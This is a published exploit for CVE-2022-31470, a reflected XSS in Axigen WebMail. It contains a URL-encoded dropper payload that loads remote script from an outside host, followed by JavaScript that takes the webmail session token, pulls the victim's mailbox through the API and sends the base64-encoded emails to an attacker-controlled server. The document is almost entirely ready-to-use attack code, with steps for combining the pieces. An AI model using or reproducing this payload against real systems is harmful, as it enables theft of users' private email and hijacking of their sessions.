# Exploit Title: Axigen <, - Reflected XSS # Google Dork: inurl:passwordexpired=yes # Date: 2023-08-21 # Exploit Author: AmirZargham # Vendor Homepage: https://www.axigen.com/ # Software Link: https://www.axigen.com/mail-server/download/ # Version: (10.5.0–4370c946) and older version of Axigen WebMail # Tested on: firefox,chrome # CVE: CVE-2022-31470 Exploit We use the second Reflected XSS to exploit this vulnerability, create a malicious link, and steal user emails. Dropper code This dropper code, loads and executes JavaScript exploit code from a remote server. '); x = document.createElement('script'); x.src = 'https://example.com/exploit.js'; window.addEventListener('DOMContentLoaded',function y(){ document.body.appendChild(x) })// Encoded form /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27 https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})// Exploit code xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new XMLHttpRequest(); oob_server = 'https://example.com/'; var script_tag = document.createElement('script'); xhr1.open('GET', '/', true); xhr1.onreadystatechange = () => { if (xhr1.readyState === XMLHttpRequest.DONE) { _h_cookie = new URL(xhr1.responseURL).search.split("=")[1]; xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`, true); xhr2.setRequestHeader('Content-Type', 'application/json'); xhr2.onreadystatechange = () => { if (xhr2.readyState === XMLHttpRequest.DONE) { if (xhr2.status === 401){ script_tag.src = `${oob_server}?status=session_expired&domain=${document.domain}`; document.body.appendChild(script_tag); } else { resp = xhr2.responseText; folderId = JSON.parse(resp)["mails"][0]["folderId"]; xhr3.open('GET', `/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true); xhr3.onreadystatechange = () => { if (xhr3.readyState === XMLHttpRequest.DONE) { emails = xhr3.responseText; script_tag.src = `${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`; document.body.appendChild(script_tag); } }; xhr3.send(); } } }; var body = JSON.stringify({isUnread: false}); xhr2.send(body); } }; xhr1.send(); Combining dropper and exploit You can host the exploit code somewhere and then address it in the dropper code.